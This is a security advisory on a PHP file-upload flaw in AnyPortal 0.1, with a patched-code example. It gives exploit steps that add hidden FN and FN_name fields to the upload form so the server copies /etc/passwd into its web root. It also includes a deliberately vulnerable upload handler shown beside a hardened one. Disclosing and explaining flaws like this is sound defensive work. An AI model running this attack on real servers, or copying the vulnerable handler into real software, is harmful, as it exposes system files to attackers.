COMMAND

    AnyPortal(php)-0.1

SYSTEMS AFFECTED

    AnyPortal(php)-0.1

PROBLEM

    'zorgon' found the following.  Secure Reality Pty Ltd. has published
    Security Advisory #1 (SRADV00001), which  describes the general  PHP
    file-upload problem:

        http://oliver.efri.hr/~crv/security/bugs/Others/php2.html

    'zorgon' reproduced this  vulnerability with AnyPortal(php)-0.1.  The
    steps below  assume AnyPortal  is installed  with its default layout,
    i.e. under /siteman000510/ with siteman.php3 as the front script.

    Save the HTML source of the following page to a file on your  local
    computer, e.g. upload.html (the name does not matter):

        http://www.victim.com/siteman000510/siteman.php3?A=U&D=

    Then replace this part of the upload form:

        <FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="/siteman000510/siteman.php3">DESTINATION DIRECTORY:<B> /</B>
        <P>PATHNAME OF LOCAL FILE<BR>
        <INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
        <INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
        <INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>

    with:

        <FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="http://www.victim.com/siteman000510/siteman.php3">DESTINATION DIRECTORY:<B> /</B>
        <P>PATHNAME OF LOCAL FILE<BR>
        <INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
        <INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
        <INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>
        <INPUT TYPE="HIDDEN" NAME="FN" VALUE="/etc/passwd"></P>
        <INPUT TYPE="HIDDEN" NAME="FN_name" VALUE="passwd">

    Submitting this form  from the local  file makes siteman.php3  treat
    /etc/passwd as the "uploaded" file and copy it into the site's  root
    directory under the name "passwd".  The copy can then be fetched over
    HTTP like  any other  file on  the web  server.  The  same works  for
    any file the web server's user account is able to read.

    The problem is not in the source code of PHP itself, and is thus not
    tied to any particular  version of PHP.  Many  PHP scripts may suffer
    from it, however,  because there was  no standard, easy  way to test
    whether a given file name refers to a temporary uploaded file or  to
    some other file on  the system.  This means  that the previous posts
    on Bugtraq were not accurate: there is no patch for PHP that  could
    prevent scripts from being vulnerable to this exploit, the logic  in
    the scripts themselves has to be modified.

    Note that prior to PHP 4.0 there is no way to turn 'register_globals'
    off, and thus no way to  remove the ability of remote  attackers to
    define variables in PHP's global scope.   (It is possible to  stop
    PHP 3.0 from processing HTTP variables completely by setting
    gpc_order to "" in php.ini, but there is then no convenient way  to
    access HTTP data at all.)

SOLUTION

    PHP supports  RFC 1867  based file  uploads.   PHP saves  uploaded
    files in a  temporary directory on  the server, using  a temporary
    name.  This temporary name is  exposed to the PHP script as  $FOO,
    where "FOO" is  the name of  the file input  tag in the  submitted
    form.  Many  PHP scripts process  $FOO without taking  measures to
    ensure that  it is  in fact  a file  that resides  in a  temporary
    directory.   A remote  attacker can  supply an  arbitrary file name
    as the value of FOO simply by submitting an ordinary (non-file)
    form field of  that name, and  thus cause the  PHP script to process
    arbitrary files on the server.

    Never trust  any input  that may  be coming  from the remote user.
    Always test  whether the variable  you expect to  contain the path
    of an uploaded  file actually contains  the path of  a temporary
    file on  the system.   It is  strongly recommended  to turn
    register_globals off if possible.  If register_globals is off, you
    can  safely  check  $HTTP_POST_VARS[]  for  information  about the
    uploaded files (see below).  If register_globals is kept  on, one
    must  realize  that  any  variable  in  the  global scope might be
    overwritten by remote user input.

    New versions of PHP  have been packaged (4.0.3RC1  and 3.0.17RC1)
    to  make  it  easier  to  secure  scripts from this vulnerability.
    They include a new function that makes it easy to determine whether
    a certain filename is a temporary uploaded file or not:

        /* Test whether a file is an uploaded file or not */
        is_uploaded_file($path);

    PHP 4.0.3 also features a new convenience function:

        /* Move an uploaded file to a new location.  If the file is not
         * a valid upload file, no action will take place.
         */
        move_uploaded_file($path, $new_path);

    In   addition,   as   of   PHP    4.0.3,   it's   safe   to    use
    $HTTP_POST_FILES["FOO"]["tmp_name"] - which  cannot be written  to
    by any remote user input,  even when register_globals is on.   The
    new versions are currently in testing, and thus have the RC tag.
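    The following is an added example, not code from AnyPortal or  from
    the PHP distribution.  It puts the vulnerable pattern described under
    the first  paragraph of  this section  (an upload  handler trusting
    $FN) side by side with the fix recommended above (reading the name
    from $HTTP_POST_FILES and checking it with is_uploaded_file()  and
    move_uploaded_file()).  The field names DIR, POSTACTION, FN and
    FN_name are taken from the AnyPortal form above; the web root
    $base_dir and the two function names are assumptions made for  the
    example.

```php
<?php
/*
 * Added example, not AnyPortal's or PHP's own code.  A minimal upload
 * handler in two versions.  Assumed (not in the advisory): the form
 * fields DIR, POSTACTION, FN and FN_name from the AnyPortal form, and
 * a hypothetical web root $base_dir.
 */

$base_dir = "/var/www/html";        /* hypothetical web root */

/*
 * VULNERABLE: register_globals on, $FN trusted.  When the request
 * carries a real <INPUT TYPE="FILE" NAME="FN">, $FN is PHP's temporary
 * upload name and this works as intended.  When it carries
 * <INPUT TYPE="HIDDEN" NAME="FN" VALUE="/etc/passwd"> instead, $FN is
 * "/etc/passwd" and copy() publishes that file under the web root as
 * $FN_name.  Nothing here distinguishes the two cases.
 */
function vulnerable_upload($FN, $FN_name, $DIR, $base_dir)
{
    $dest = $base_dir . "/" . $DIR . "/" . $FN_name;
    return copy($FN, $dest);        /* copies any file the server can read */
}

/*
 * HARDENED (PHP 4.0.3 / 3.0.17 and later): take the temporary name from
 * $HTTP_POST_FILES, which a client cannot overwrite even with
 * register_globals on, confirm it with is_uploaded_file(), and store it
 * with move_uploaded_file(), which itself refuses anything that is not
 * an RFC 1867 upload.  The client-supplied FN_name field is ignored;
 * the name comes from the same request array.
 */
function hardened_upload($files, $DIR, $base_dir)
{
    if (!isset($files["FN"]) || !is_uploaded_file($files["FN"]["tmp_name"])) {
        return false;               /* FN was not a real file upload */
    }
    /* basename() on the client-supplied names is an extra hardening
       step, not from the advisory: it stops "../" from pushing the
       stored file outside $base_dir. */
    $name = basename($files["FN"]["name"]);
    $dir  = basename($DIR);
    $dest = $base_dir . "/" . $dir . "/" . $name;
    return move_uploaded_file($files["FN"]["tmp_name"], $dest);
}

/* Dispatch on POSTACTION, reading input only from the request arrays
   rather than from variables that register_globals may have set. */
if (isset($HTTP_POST_VARS["POSTACTION"]) &&
    $HTTP_POST_VARS["POSTACTION"] == "UPLOAD") {
    $dir = isset($HTTP_POST_VARS["DIR"]) ? $HTTP_POST_VARS["DIR"] : "";
    if (hardened_upload($HTTP_POST_FILES, $dir, $base_dir)) {
        echo "upload stored\n";
    } else {
        echo "rejected: FN is not a temporary uploaded file\n";
    }
}
?>
```

    Against the modified form from the PROBLEM section, the vulnerable
    handler copies /etc/passwd into the web root, while the hardened one
    rejects the request: the hidden FN field never reaches
    $HTTP_POST_FILES, and is_uploaded_file() returns false for any path
    PHP did not create for this request.  On PHP versions before 4.0.3
    / 3.0.17 the only available defence is the one stated above, a
    script-level check that the path really lies in the upload
    temporary directory.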

    PHP 4.0.3RC1:

        http://www.php.net/do_download.php?download_file=php-4.0.3RC1.tar.gz

    PHP 3.0.17RC1 (upgrading to PHP 4.0 is strongly recommended):

        http://www.php.net/distributions/php-3.0.17RC1.tar.gz